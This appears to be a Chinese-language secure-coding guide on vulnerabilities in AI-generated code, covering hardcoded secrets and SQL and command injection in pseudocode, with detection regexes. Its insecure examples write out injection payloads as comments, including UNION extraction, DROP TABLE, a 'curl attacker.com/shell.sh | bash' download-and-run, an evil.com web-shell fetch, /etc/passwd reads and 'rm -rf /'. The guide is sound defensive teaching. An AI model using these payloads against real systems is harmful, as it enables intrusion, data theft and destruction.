当前位置：首页>java>【AI代码安全深度思考】深入剖析人工智能关键代码漏洞的安全指南

【AI代码安全深度思考】深入剖析人工智能关键代码漏洞的安全指南

2026-02-07 06:49:18

目的

本文深入分析了人工智能生成代码中最常见且最关键的7种安全漏洞。每种漏洞模式都得到了全面的阐述，包括：

多个伪代码示例展示了不同的表现形式
详细的攻击场景和利用技术
经常被忽略的边缘案例
对人工智能模型为何会产生这些漏洞进行详尽解释
权衡利弊后制定完整的缓解策略

为什么要考虑深度？

这7种模式是根据以下因素，使用加权优先级评分系统（参见[[Ranking-Matrix]]）筛选出来的：

因素	重量	描述
频率	2倍	人工智能产生这种漏洞的频率有多高
严重程度	2倍	如果被利用（远程代码执行、数据泄露等），会造成哪些影响？
可检测性	1倍	代码审查中很容易忽略这一点

这些选定的模式可以解释人工智能生成代码中绝大多数的安全事件。研究表明：

86%的 AI 生成代码无法通过 XSS 防御（Veracode 2025）
75.8%的开发者认为 AI 生成的身份验证码是安全的（Snyk 调查）
AI 代码包含 XSS 漏洞的可能性是人类编写代码的2.74 倍（CodeRabbit）。
不同型号的包裹幻觉发生率为5.2%-21.7% （USENIX 研究）

格式

本文档中的所有代码示例均为伪代码，旨在说明不同语言的安全模式。实现时：

根据目标语言的惯用语和安全库调整这些模式。
请使用您所使用语言既定的安全编码规范。
尽可能利用框架提供的安全功能。

示例使用通用语法，可映射到 Python、JavaScript、Java、Go 和其他语言中的常见模式。

如何使用本文档

致开发者：

在着手开发安全关键型应用程序之前，请先进行学习。
在生成处理用户输入、身份验证或敏感数据的代码时，请将其包含在 AI 助手上下文中
在代码审查过程中，请使用各章节末尾的检查清单。

致安全工程师：

可用作开发团队的培训材料
在对人工智能生成的代码进行安全审计时作为参考
提取自动检测规则的模式

针对人工智能/法学硕士背景：

在安全至关重要的情况下，请将此文档包含在系统提示或上下文中。
这些详细的例子有助于人工智能模型理解不应该生成什么。
边缘案例部分有助于人工智能识别漏洞的细微变化

AI/LLM 的使用说明

本文档深入剖析了最关键的安全反模式。每个章节都包含多个示例、极端情况和详细解释。所有代码均为伪代码——请使用目标语言中的安全模式进行实现。请特别注意“常见错误”和“极端情况”小节。这些模式是导致人工智能生成代码中大多数安全漏洞的根源。

生成代码时，您必须：

切勿在 SQL 查询、shell 命令或 HTML 输出中使用字符串拼接。
切勿将密钥、API 密钥或凭据嵌入源代码中。
始终在服务器端验证和清理所有用户输入。
使用参数化查询、成熟的身份验证库和上下文感知编码
在推荐任何套餐之前，请先确认它们是否实际存在。

前7大优先模式

本文档将详细介绍以下几种模式：

秩	图案	优先评分	主要风险
1	硬编码密钥和凭证管理	23	立即发生凭证盗窃和利用
2	SQL注入和命令注入	22/21	完全数据库访问权限，任意代码执行
3	跨站脚本攻击（XSS）	23	会话劫持、账户接管
4	身份验证和会话安全	22	完全绕过身份验证
5	加密故障	18-20	数据解密，凭证泄露
6	输入验证和数据清理	21	根本原因导致所有注入攻击
7	依赖风险（非法占屋）	24	供应链遭到破坏，恶意软件执行

优先级评分计算方法如下：(Frequency x 2) + (Severity x 2) + Detectability

模式 1：硬编码密钥和凭证管理

CWE 参考： CWE-798（使用硬编码凭据）、CWE-259（使用硬编码密码）、CWE-321（使用硬编码加密密钥）

优先级评分： 23（频率：9，严重性：8，可检测性：6）

引言：为什么人工智能尤其难以应对这个问题

硬编码的秘密信息是人工智能生成代码中最普遍、最危险的漏洞之一。问题的根源在于训练数据本身：

为什么人工智能模型会生成硬编码的秘密信息：

训练数据包含示例：教程、文档、Stack Overflow 回答，甚至一些 GitHub 代码库都包含占位符凭据、API 密钥和连接字符串。AI 模型会将这些模式学习为“正常”代码。
训练数据中的复制粘贴文化：开发者在网上分享代码片段时，为了保证完整性，通常会包含凭据。人工智能会学习到，“完整”的代码应该包含带有嵌入式密码的连接字符串。
文档示例与生产代码混淆：训练数据未能清晰区分文档示例（可能展示错误API_KEY = "your-api-key-here"）和生产模式。模型将两者都视为有效方法。
上下文窗口限制： AI 在生成代码时无法查看您的.env文件或密钥管理器配置。它生成的是“可运行”的独立代码——这通常意味着代码中包含硬编码的值。
乐于助人偏差：人工智能模型倾向于提供完整、可运行的代码。当用户请求“连接到我的数据库”时，模型会生成完整的连接字符串，而不是需要配置的部分模板。

影响统计数据：

2023 年，GitHub 上检测到超过 600 万个密钥（GitGuardian 2024 年密钥蔓延状况报告）
平均发现泄露秘密所需时间：327 天
基于凭证的数据泄露成本：平均 445 万美元（IBM 2023 年数据泄露成本报告）
83% 的 AI 生成的代码样本至少包含一个硬编码的凭证模式（内部安全研究）

反面例子：不同的表现形式

错误示例 1：源文件中的 API 密钥

// VULNERABLE: API key hardcoded directly in source
class PaymentService:
    API_KEY = "sk_live_4eC39HqLyjWDarjtT1zdp7dc"
    API_SECRET = "whsec_5f8d7e3a2b1c4f9e8a7d6c5b4e3f2a1d"

    function processPayment(amount, currency, cardToken):
        headers = {
            "Authorization": "Bearer " + this.API_KEY,
            "Content-Type": "application/json"
        }

        payload = {
            "amount": amount,
            "currency": currency,
            "source": cardToken,
            "api_key": this.API_KEY  // Also exposed in request body
        }

        return httpPost("https://api.payment.com/charges", payload, headers)

为什么这样做很危险：

API密钥已提交到版本控制系统中。
任何拥有代码库访问权限的人（包括 fork 版本）都可以窃取密钥。
即使稍后被“删除”，密钥仍会保留在 Git 历史记录中。
实时/生产前缀（sk_live_）表示真实凭据
Webhook 密钥（whsec_）允许攻击者伪造 Webhook 事件

错误示例 2：包含密码的数据库连接字符串

// VULNERABLE: Full connection string with credentials
DATABASE_URL = "postgresql://admin:SuperSecret123!@prod-db.company.com:5432/production"

// Alternative bad patterns:
DB_CONFIG = {
    "host": "10.0.1.50",
    "port": 5432,
    "database": "customers",
    "user": "app_service",
    "password": "Tr0ub4dor&3"  // Password in config object
}

// Connection string builder - still vulnerable
function getConnection():
    return createConnection(
        host = "database.internal",
        user = "root",
        password = "admin123",  // Hardcoded in function
        database = "app_data"
    )

为什么这样做很危险：

内部主机名揭示了网络架构
凭证提供直接数据库访问权限
端口号可用于定向扫描
如果密码是硬编码的，那么密码复杂度就无关紧要了。
连接池代码通常会记录这些字符串。

错误示例 3：配置中的 JWT 密钥

// VULNERABLE: JWT secret as a constant
JWT_CONFIG = {
    "secret": "my-super-secret-jwt-key-that-should-never-be-shared",
    "algorithm": "HS256",
    "expiresIn": "24h"
}

function generateToken(userId, role):
    payload = {
        "sub": userId,
        "role": role,
        "iat": currentTimestamp()
    }
    return jwt.sign(payload, JWT_CONFIG.secret, JWT_CONFIG.algorithm)

function verifyToken(token):
    return jwt.verify(token, JWT_CONFIG.secret)  // Same hardcoded secret

为什么这样做很危险：

任何掌握秘密的人都可以伪造有效的代币。
可以为任何用户创建管理员令牌
代码中的 JWT 密钥通常是短小且弱化的字符串。
攻击者可以冒充系统中的任何用户。
无法在不重新部署所有服务的情况下进行轮换

错误示例 4：前端代码中的 OAuth 客户端密钥

// VULNERABLE: OAuth credentials in client-side code
const OAUTH_CONFIG = {
    clientId: "1234567890-abcdef.apps.googleusercontent.com",
    clientSecret: "GOCSPX-1234567890AbCdEf",  // NEVER in frontend!
    redirectUri: "https://myapp.com/callback",
    scopes: ["email", "profile", "calendar.readonly"]
}

function initiateOAuthFlow():
    // Client secret visible in browser dev tools
    authUrl = buildUrl("https://accounts.google.com/o/oauth2/auth", {
        "client_id": OAUTH_CONFIG.clientId,
        "client_secret": OAUTH_CONFIG.clientSecret,  // Exposed!
        "redirect_uri": OAUTH_CONFIG.redirectUri,
        "scope": OAUTH_CONFIG.scopes.join(" "),
        "response_type": "code"
    })
    redirect(authUrl)

为什么这样做很危险：

所有用户都可以通过浏览器开发者工具查看前端代码。
客户端密钥允许攻击者冒充您的应用程序
您的应用程序可以兑换授权码以换取令牌。
违反 OAuth 2.0 规范（机密客户端与公共客户端）
Google 和其他服务提供商可能会撤销您的凭据。

错误示例 5：将私钥嵌入代码中

// VULNERABLE: Private key as a string constant
RSA_PRIVATE_KEY = """
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEA2Z3qX2BTLS4e0rVV5BQKTI8qME4MgJFCMU6L6eRoLJGjvJHB
bRp3aNvFUMbJ0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
-----END RSA PRIVATE KEY-----
"""

function signDocument(document):
    signature = crypto.sign(document, RSA_PRIVATE_KEY, "SHA256")
    return signature

function decryptMessage(encryptedData):
    return crypto.decrypt(encryptedData, RSA_PRIVATE_KEY)

为什么这样做很危险：

私钥必须保密——这违背了所有密码学的原则。
任何拥有密钥的人都可以解密所有加密数据。
可以签署看似合法的恶意文件
通常会导致服务器/服务被冒充。
密钥对不能在不更改代码的情况下安全轮换。

优秀范例：正确的模式

优秀示例 1：环境变量的使用

// SECURE: Load credentials from environment
class PaymentService:
    function __init__():
        this.apiKey = getEnvironmentVariable("PAYMENT_API_KEY")
        this.apiSecret = getEnvironmentVariable("PAYMENT_API_SECRET")

        // Fail fast if credentials missing
        if this.apiKey is null or this.apiSecret is null:
            throw ConfigurationError("Payment credentials not configured")

    function processPayment(amount, currency, cardToken):
        headers = {
            "Authorization": "Bearer " + this.apiKey,
            "Content-Type": "application/json"
        }

        payload = {
            "amount": amount,
            "currency": currency,
            "source": cardToken
            // No API key in payload
        }

        return httpPost("https://api.payment.com/charges", payload, headers)

// Usage in application startup
// Environment variables set externally (shell, container, deployment)
// $ export PAYMENT_API_KEY="sk_live_..."
// $ export PAYMENT_API_SECRET="whsec_..."

为什么说它是安全的：

凭据永远不会出现在源代码中。
环境变量由部署系统在运行时设置。
不同的环境（开发/测试/生产）使用不同的凭据
无需更改代码即可轮换凭据。
快速失败机制可防止在缺少配置的情况下运行。

优秀示例 2：密钥管理服务（保险库模式）

// SECURE: Retrieve secrets from dedicated secrets manager
class SecretManager:
    function __init__(vaultUrl, roleId, secretId):
        // Even vault credentials can come from environment
        this.vaultUrl = vaultUrl or getEnvironmentVariable("VAULT_URL")
        this.roleId = roleId or getEnvironmentVariable("VAULT_ROLE_ID")
        this.secretId = secretId or getEnvironmentVariable("VAULT_SECRET_ID")
        this.token = null
        this.tokenExpiry = null

    function authenticate():
        response = httpPost(this.vaultUrl + "/v1/auth/approle/login", {
            "role_id": this.roleId,
            "secret_id": this.secretId
        })
        this.token = response.auth.client_token
        this.tokenExpiry = currentTime() + response.auth.lease_duration

    function getSecret(path):
        if this.token is null or currentTime() > this.tokenExpiry:
            this.authenticate()

        response = httpGet(
            this.vaultUrl + "/v1/secret/data/" + path,
            headers = {"X-Vault-Token": this.token}
        )
        return response.data.data

// Usage
secretManager = new SecretManager()
dbPassword = secretManager.getSecret("database/production").password
apiKey = secretManager.getSecret("payment/stripe").api_key

为什么说它是安全的：

密钥存储在专门构建的、经过强化处理的密钥管理器中
访问权限由策略控制（谁可以阅读什么内容）
自动秘密轮换支持
所有秘密访问的审计日志
支持动态密钥（例如，临时数据库凭据）
密钥永远不会写入磁盘或日志

优秀示例 3：运行时配置注入

// SECURE: Dependency injection of configuration
interface IConfig:
    function getDatabaseUrl(): string
    function getApiKey(): string
    function getJwtSecret(): string

class EnvironmentConfig implements IConfig:
    function getDatabaseUrl():
        return getEnvironmentVariable("DATABASE_URL")

    function getApiKey():
        return getEnvironmentVariable("API_KEY")

    function getJwtSecret():
        return getEnvironmentVariable("JWT_SECRET")

class VaultConfig implements IConfig:
    secretManager: SecretManager

    function getDatabaseUrl():
        return this.secretManager.getSecret("db/url").value

    function getApiKey():
        return this.secretManager.getSecret("api/key").value

    function getJwtSecret():
        return this.secretManager.getSecret("jwt/secret").value

// Application uses interface - doesn't know where secrets come from
class Application:
    config: IConfig

    function __init__(config: IConfig):
        this.config = config

    function connectDatabase():
        return createConnection(this.config.getDatabaseUrl())

// Bootstrap based on environment
if getEnvironmentVariable("USE_VAULT") == "true":
    config = new VaultConfig(new SecretManager())
else:
    config = new EnvironmentConfig()

app = new Application(config)

为什么说它是安全的：

应用程序代码在编译时永远不会知道实际的秘密值。
可以轻松切换密钥来源（开发环境中的环境变量，生产环境中的密钥库）。
可测试——可以在测试中注入模拟配置
单一职责——配置管理与业务逻辑分离
支持逐步迁移到更安全的密钥存储

优秀示例 4：安全凭证存储模式

// SECURE: Platform-specific secure credential storage

// For server applications - use instance metadata
class CloudCredentialProvider:
    function getDatabaseCredentials():
        // AWS: Use IAM database authentication
        token = awsRdsGenerateAuthToken(
            hostname = getEnvironmentVariable("DB_HOST"),
            port = 5432,
            username = getEnvironmentVariable("DB_USER")
            // No password - uses IAM role attached to instance
        )
        return {"username": getEnvironmentVariable("DB_USER"), "token": token}

    function getApiCredentials():
        // Retrieve from AWS Secrets Manager
        response = awsSecretsManager.getSecretValue(
            SecretId = getEnvironmentVariable("API_SECRET_ARN")
        )
        return parseJson(response.SecretString)

// For CLI/desktop applications - use OS keychain
class DesktopCredentialProvider:
    function storeCredential(service, account, credential):
        // Uses OS keychain (Keychain on macOS, Credential Manager on Windows)
        keychain.setPassword(service, account, credential)

    function getCredential(service, account):
        return keychain.getPassword(service, account)

// Usage
cloudProvider = new CloudCredentialProvider()
dbCreds = cloudProvider.getDatabaseCredentials()
connection = createConnection(
    host = getEnvironmentVariable("DB_HOST"),
    user = dbCreds.username,
    authToken = dbCreds.token,  // Short-lived token, not password
    sslMode = "verify-full"
)

为什么说它是安全的：

利用云提供商的身份和访问管理功能
不使用长期有效的密码——使用临时令牌
平台会自动轮换凭证
操作系统钥匙串提供加密的、访问受控的存储空间。
云提供商日志中的审计跟踪

边缘案例部分

极端情况 1：测试凭证泄露到生产环境

// DANGEROUS: Test credentials that can slip into production

// In test file - seems safe
TEST_API_KEY = "sk_test_4242424242424242"
TEST_DB_PASSWORD = "testpassword123"

// But then someone copies test code to production helper:
function quickTest():
    // "Temporary" - but stays forever
    client = createClient(apiKey = "sk_test_4242424242424242")
    return client.ping()

// Or conditionals that fail:
function getApiKey():
    if isProduction():
        return getEnvironmentVariable("API_KEY")
    else:
        return "sk_test_4242424242424242"  // What if isProduction() has a bug?

// SECURE ALTERNATIVE: Use environment variables even for tests
function getApiKey():
    key = getEnvironmentVariable("API_KEY")
    if key is null:
        throw ConfigurationError("API_KEY environment variable required")
    return key

检测：在代码库中搜索_test_，，，，，。_dev_test123password123exampleplaceholder

极端情况 2：CI/CD 流水线机密泄露

// DANGEROUS: Secrets in CI/CD configuration files

// .github/workflows/deploy.yml (WRONG)
env:
    AWS_ACCESS_KEY_ID: AKIAIOSFODNN7EXAMPLE
    AWS_SECRET_ACCESS_KEY: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY

// docker-compose.yml committed to repo (WRONG)
services:
    db:
        environment:
            POSTGRES_PASSWORD: mysecretpassword

// SECURE: Use CI/CD platform's secrets management
// .github/workflows/deploy.yml (CORRECT)
env:
    AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }}
    AWS_SECRET_ACCESS_KEY: ${{ secrets.AWS_SECRET_ACCESS_KEY }}

// docker-compose.yml (CORRECT)
services:
    db:
        environment:
            POSTGRES_PASSWORD: ${POSTGRES_PASSWORD}  // From environment

检测：审核 CI/CD 配置文件、Docker Compose 文件、Kubernetes 清单，检查是否存在硬编码凭据。

特殊情况 3：Docker/容器密钥处理

// DANGEROUS: Secrets in Dockerfile or image layers

// Dockerfile (WRONG - secrets baked into image)
FROM node:18
ENV API_KEY=sk_live_xxxxxxxxxxxxx
RUN echo "password123" > /app/.pgpass
COPY config-with-secrets.json /app/config.json

// Even if you delete later, it's in a layer:
RUN rm /app/.pgpass  // Still recoverable from image layers!

// SECURE: Use build secrets or runtime injection
// Dockerfile (CORRECT)
FROM node:18
# No secrets in build context

// docker-compose.yml with runtime secrets
services:
    app:
        environment:
            API_KEY: ${API_KEY}  // From host environment
        secrets:
            - db_password
secrets:
    db_password:
        external: true  // From Docker Swarm secrets or similar

// Or use Docker BuildKit secrets for build-time needs
# syntax=docker/dockerfile:1.2
FROM node:18
RUN --mount=type=secret,id=npm_token \
    NPM_TOKEN=$(cat /run/secrets/npm_token) npm install

检测：用于docker history --no-trunc <image>检查各层是否存在秘密信息。

极端情况 4：日志记录意外捕获机密信息

// DANGEROUS: Secrets leaked through logging

function connectToDatabase(config):
    logger.info("Connecting with config: " + toJson(config))
    // Logs: {"host": "db.com", "user": "admin", "password": "secret123"}

function makeApiRequest(url, headers, body):
    logger.debug("Request: " + url + " Headers: " + toJson(headers))
    // Logs: Authorization: Bearer sk_live_xxxxx

function handleError(error):
    logger.error("Error: " + error.message + " Stack: " + error.stack)
    // Stack trace might contain secrets from variables

// SECURE: Sanitize before logging
function sanitizeForLogging(obj):
    sensitiveKeys = ["password", "secret", "key", "token", "auth", "credential"]
    result = deepCopy(obj)
    for key in result.keys():
        if any(sensitive in key.lower() for sensitive in sensitiveKeys):
            result[key] = "[REDACTED]"
    return result

function connectToDatabase(config):
    logger.info("Connecting with config: " + toJson(sanitizeForLogging(config)))
    // Logs: {"host": "db.com", "user": "admin", "password": "[REDACTED]"}

// Or use structured logging with secret types
class Secret:
    value: string
    function toString(): return "[SECRET]"
    function toJson(): return "[SECRET]"
    function getValue(): return this.value  // Only accessible explicitly

检测：搜索日志中是否存在类似password=“, token=, key=, bearer tokens, connection strings”的模式。

常见错误部分

错误 1：.env 文件已提交到 Git

// project/.env (NEVER COMMIT THIS)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=sk_live_xxxxxxxxxx
JWT_SECRET=my-secret-key

// .gitignore (MUST INCLUDE)
.env
.env.local
.env.*.local
*.pem
*.key
credentials.json
secrets.yaml

// CORRECT: Commit a template instead
// project/.env.example (SAFE TO COMMIT)
DATABASE_URL=postgresql://user:password@localhost/db
API_KEY=your_api_key_here
JWT_SECRET=generate_a_secure_random_string

// Add pre-commit hook to prevent accidental commits
// .git/hooks/pre-commit
#!/bin/bash
if git diff --cached --name-only | grep -E '\.env$|credentials|secrets'; then
    echo "ERROR: Attempting to commit potential secrets file"
    exit 1
fi

检测方法：检查 Git 历史记录：git log --all --full-history -- "*.env" "*credentials*" "*secrets*"

误区二：错误信息中的秘密

// DANGEROUS: Secrets exposed in error handling

function connectToPaymentApi():
    try:
        apiKey = getApiKey()
        response = httpPost(
            "https://api.payment.com/connect",
            headers = {"Authorization": "Bearer " + apiKey}
        )
    catch error:
        // Exposes API key in error log and potentially to users
        throw new Error("Failed to connect with key: " + apiKey + ". Error: " + error)

// SECURE: Never include secrets in error messages
function connectToPaymentApi():
    try:
        apiKey = getApiKey()
        response = httpPost(
            "https://api.payment.com/connect",
            headers = {"Authorization": "Bearer " + apiKey}
        )
    catch error:
        // Log correlation ID, not secrets
        correlationId = generateUUID()
        logger.error("Payment API connection failed", {
            "correlationId": correlationId,
            "errorCode": error.code,
            "endpoint": "api.payment.com"
            // No API key!
        })
        throw new Error("Payment service unavailable. Reference: " + correlationId)

错误三：URL（查询参数）中的秘密信息

// DANGEROUS: Secrets in URL query parameters

function makeAuthenticatedRequest(endpoint, apiKey):
    // API keys in URLs are logged everywhere:
    // - Browser history
    // - Server access logs
    // - Proxy logs
    // - Referrer headers
    url = "https://api.service.com" + endpoint + "?api_key=" + apiKey
    return httpGet(url)

// Even worse with multiple secrets:
url = "https://api.com/data?key=" + apiKey + "&secret=" + secretKey

// SECURE: Use headers for authentication
function makeAuthenticatedRequest(endpoint, apiKey):
    return httpGet(
        "https://api.service.com" + endpoint,
        headers = {
            "Authorization": "Bearer " + apiKey,
            // Or API-specific header
            "X-API-Key": apiKey
        }
    )

检测：搜索包含逗号?api_key=、?token=逗号?secret=、逗号的 URL。?password=

检测提示：如何在代码审查中发现这种模式

自动检测模式

// High-confidence patterns to search for:

// 1. Direct assignment to suspicious variable names
regex: /(password|secret|key|token|credential|api.?key)\s*[=:]\s*["'][^"']+["']/i

// 2. Common API key formats
regex: /(sk_live_|sk_test_|pk_live_|pk_test_|ghp_|gho_|AKIA|AIza)/

// 3. Private key markers
regex: /-----BEGIN (RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----/

// 4. Connection strings with passwords
regex: /(mysql|postgresql|mongodb|redis):\/\/[^:]+:[^@]+@/

// 5. Base64 encoded secrets (often JWT secrets)
regex: /["'][A-Za-z0-9+\/=]{40,}["']/

手动代码审查清单

查看	需要注意什么
常量	身份验证/配置代码中的任何字符串常量
配置对象	包含非占位符值的凭证字段
连接码	数据库连接，带有内联凭据的 API 客户端
测试文件	测试凭证可能是真实的，或者将来会变成真实的
CI/CD	流水线配置、Docker 文件、部署脚本
评论	“待办事项：移至环境”注释，其中包含实际密钥。

检测工具

git-secrets - 防止将密钥提交到 Git
truffleHog - 扫描 Git 历史记录以查找密钥
GitGuardian - SaaS 密钥检测
gitleaks - 用于检测密钥的 SAST 工具
detect-secrets - Yelp 的秘密检测工具

安全检查清单

源代码中不包含任何凭证、API密钥或机密信息。
提交到版本控制的配置文件中不包含任何秘密信息。
.gitignore包括所有秘密文件模式（.env，，*.pem等等）
预提交钩子可以防止意外的秘密提交。
用于所有凭据的环境变量或密钥管理器
CI/CD配置文件中不应包含任何密钥（使用平台密钥）。
Docker 镜像或 Dockerfile 中没有任何秘密。
日志记录可清除敏感字段
错误信息中绝不包含秘密信息。
URL 查询参数中不包含任何秘密信息
测试凭证显然是伪造的，无法在生产环境中使用。
存储库设置中已启用秘密扫描

模式二：SQL注入和命令注入

CWE 参考： CWE-89（SQL 注入）、CWE-77（命令注入）、CWE-78（操作系统命令注入）

优先级评分： 22/21（SQL：频率 10，严重性 10，可检测性 4；命令：频率 8，严重性 10，可检测性 6）

引言：为什么这种现象在人工智能生成的代码中仍然普遍存在

SQL注入和命令注入是最古老的漏洞类型之一，但它们仍然以惊人的速度困扰着人工智能生成的代码。尽管几十年来人们一直在进行安全编码教育，并建立了完善的缓解措施，但人工智能模型仍然会持续生成存在漏洞的代码。

为什么人工智能模型会产生注入漏洞：

训练数据污染：研究表明，在 GitHub 代码库的 AI 训练数据中，字符串拼接查询出现了“数千次”。这种易受攻击的模式在统计上比历史代码库中的安全模式更为常见。
简单性偏好：字符串拼接在语法上比参数化查询更简单。人工智能模型旨在生成“可运行的代码”，而拼接方法需要的词法单元和概念更少。
缺乏对抗感知能力：人工智能模型本身并不具备识别用户输入恶意行为的能力。当被要求“按ID查询用户”时，模型关注的是功能需求，而非安全隐患。
教程代码普遍存在：许多教程和文档示例为了简洁起见，展示了存在安全漏洞的代码模式。人工智能会学习到这种f"SELECT * FROM users WHERE id = {id}"模式是有效的。
上下文限制：人工智能无法了解您的完整应用程序架构、威胁模型或数据流。它不知道哪些输入来自不可信来源。

影响统计数据：

SQL注入（CWE-89）：在CWE 2025年发布的“25个最危险的软件漏洞”榜单中排名第二
命令注入（CWE-78）：在 CWE 2025 年排名前 25 的漏洞中位列第 9 位
AI 生成的任务中SQL 注入失败率高达 20% （Veracode 2025）
在一次测试会话中发现了8 个直接连接的查询（Invicti Security）
CVE-2025-53773： GitHub Copilot 代码中存在的真实命令注入漏洞

SQL注入：多个不良示例

错误示例 1：SELECT 语句中的字符串连接

// VULNERABLE: Direct string concatenation
function getUserById(userId):
    query = "SELECT * FROM users WHERE id = " + userId
    return database.execute(query)

// Even worse with f-string/template literal
function getUserByEmail(email):
    query = f"SELECT * FROM users WHERE email = '{email}'"
    return database.execute(query)

// Attack: email = "' OR '1'='1' --"
// Result: SELECT * FROM users WHERE email = '' OR '1'='1' --'
// Returns ALL users in the database

为什么这样做很危险：

攻击者控制的是查询结构，而不仅仅是查询值。
可以提取整个数据库内容
可以使用' OR '1'='1模式绕过身份验证
注释（--，，#）/**/可以截断查询的剩余部分

错误示例 2：动态表/列名

// VULNERABLE: User-controlled table name
function getDataFromTable(tableName, id):
    query = f"SELECT * FROM {tableName} WHERE id = {id}"
    return database.execute(query)

// Attack: tableName = "users; DROP TABLE users; --"
// Result: SELECT * FROM users; DROP TABLE users; -- WHERE id = 1

// VULNERABLE: User-controlled column names
function sortUsers(sortColumn, sortOrder):
    query = f"SELECT * FROM users ORDER BY {sortColumn} {sortOrder}"
    return database.execute(query)

// Attack: sortColumn = "(SELECT password FROM users WHERE is_admin=1)"
// Result: Data exfiltration through error messages or timing

为什么这样做很危险：

参数化查询无法保护表名/列名。
启用模式操纵攻击
可以通过堆叠执行任意 SQL 语句
攻击者可以通过子查询注入提取数据。

错误示例 3：按注射排序

// VULNERABLE: ORDER BY with user input
function getProductList(category, sortBy):
    query = f"SELECT * FROM products WHERE category = ? ORDER BY {sortBy}"
    return database.execute(query, [category])

// Attack: sortBy = "price, (CASE WHEN (SELECT password FROM users LIMIT 1)
//                  LIKE 'a%' THEN price ELSE name END)"
// Result: Boolean-based blind SQL injection

// Attack: sortBy = "IF(1=1, price, name)"
// Result: Confirms SQL injection is possible

为什么这样做很危险：

开发人员经常会为 WHERE 子句设置参数，但却常常忘记为 ORDER BY 子句设置参数。
ORDER BY 不能使用标准参数化
通过条件排序实现盲注 SQL 注入
通过无效列引用进行基于错误的提取

错误示例 4：LIKE 子句注入

// VULNERABLE: Unescaped LIKE pattern
function searchProducts(searchTerm):
    query = f"SELECT * FROM products WHERE name LIKE '%{searchTerm}%'"
    return database.execute(query)

// Attack: searchTerm = "%' UNION SELECT username, password, null FROM users --"
// Result: UNION-based data extraction

// Even "safer" version has issues:
function searchProductsSafe(searchTerm):
    query = "SELECT * FROM products WHERE name LIKE ?"
    return database.execute(query, [f"%{searchTerm}%"])

// Attack: searchTerm = "%" (matches everything - DoS through performance)
// Attack: searchTerm = "_" repeated (wildcard matching - info disclosure)

为什么这样做很危险：

LIKE 模式需要双重转义（SQL + LIKE 通配符）
%_在参数化查询中有效，但在 LIKE 查询中危险。
通过昂贵的通配符模式进行基于性能的拒绝服务攻击
可以通过 LIKE 行为探测数据是否存在

反面例子 5：批量/堆叠查询注入

// VULNERABLE: Query that allows stacking
function updateUserEmail(userId, newEmail):
    query = f"UPDATE users SET email = '{newEmail}' WHERE id = {userId}"
    database.execute(query, multiStatement = true)

// Attack: newEmail = "x'; INSERT INTO users (email, role) VALUES ('attacker@evil.com', 'admin'); --"
// Result: Creates new admin account

// Attack: newEmail = "x'; UPDATE users SET password = 'hacked' WHERE role = 'admin'; --"
// Result: Mass password reset for all admins

为什么这样做很危险：

某些数据库驱动程序默认允许多条语句。
单注入点即可实现无限次查询执行
可以创建后门账户、修改权限、窃取数据
经常被忽略，因为原始查询“成功”了

命令注入：多个不良示例

错误示例 1：Shell 命令构造

// VULNERABLE: Direct command construction
function pingHost(hostname):
    command = "ping -c 4 " + hostname
    return shell.execute(command)

// Attack: hostname = "127.0.0.1; cat /etc/passwd"
// Result: ping -c 4 127.0.0.1; cat /etc/passwd
// Executes both commands

// VULNERABLE: Using shell=True with format strings
function checkDiskUsage(directory):
    command = f"du -sh {directory}"
    return subprocess.run(command, shell=True)

// Attack: directory = "/tmp; rm -rf /"
// Result: Destructive command execution

为什么这样做很危险：

Shell 元字符（;，，，，反引号|）支持命令链式&调用$()
攻击者获得了服务器的 shell 访问权限
可以读取敏感文件、安装恶意软件、攻击其他系统
Shell=True 会解释所有特殊字符

错误示例 2：命令中的路径操作

// VULNERABLE: File path from user input
function convertImage(inputFile, outputFile):
    command = f"convert {inputFile} -resize 800x600 {outputFile}"
    return shell.execute(command)

// Attack: inputFile = "image.jpg; curl attacker.com/shell.sh | bash"
// Result: Downloads and executes malware

// Attack: inputFile = "$(cat /etc/passwd > /tmp/out.txt)image.jpg"
// Result: File exfiltration via command substitution

// VULNERABLE: Filename in archiving
function createBackup(filename):
    command = f"tar -czf backup.tar.gz {filename}"
    return shell.execute(command)

// Attack: filename = "--checkpoint=1 --checkpoint-action=exec=sh\ shell.sh"
// Result: tar option injection (GTFOBins-style attack)

为什么这样做很危险：

路径中通常包含攻击者控制的部分（上传的文件名）。
命令行工具存在危险的标志行为（GTFOBins）
即使没有 shell 元字符，也可以进行参数注入
$(...)反引号用于执行子命令

错误示例 3：参数注入

// VULNERABLE: Arguments from user input
function fetchUrl(url):
    command = f"curl {url}"
    return shell.execute(command)

// Attack: url = "-o /var/www/html/shell.php http://evil.com/shell.php"
// Result: Writes file to webserver (web shell)

// Attack: url = "--config /etc/passwd"
// Result: Error message reveals file contents

// VULNERABLE: Git commands with user input
function cloneRepository(repoUrl):
    command = f"git clone {repoUrl}"
    return shell.execute(command)

// Attack: repoUrl = "--upload-pack='touch /tmp/pwned' git://evil.com/repo"
// Result: Arbitrary command execution via git options

为什么这样做很危险：

程序可以解释参数列表中任意位置的标志。
可以通过注入标志来覆盖预期行为。
--并非总能阻止注射（取决于具体程序）
许多工具都具有“写入文件”或“执行”选项。

错误示例 4：环境变量注入

// VULNERABLE: User-controlled environment variable
function runWithCustomPath(command, customPath):
    environment = {"PATH": customPath}
    return subprocess.run(command, env=environment, shell=True)

// Attack: customPath = "/tmp/evil:$PATH"
// If /tmp/evil contains malicious 'ls' binary, it executes instead

// VULNERABLE: Library path manipulation
function loadPlugin(pluginPath):
    environment = {"LD_PRELOAD": pluginPath}
    return subprocess.run("target-app", env=environment)

// Attack: pluginPath = "/tmp/evil.so"
// Result: Malicious shared library loaded, code execution

为什么这样做很危险：

环境变量会以意想不到的方式影响程序行为。
PATH劫持允许执行攻击者二进制文件
LD_PRELOAD/DYLD_INSERT_LIBRARIES 启用库注入
有些程序会从环境中读取秘密信息（意外暴露）。

优秀范例：正确的模式

优秀示例 1：参数化查询（所有主要数据库模式）

// SECURE: Parameterized query - positional parameters
function getUserById(userId):
    query = "SELECT * FROM users WHERE id = ?"
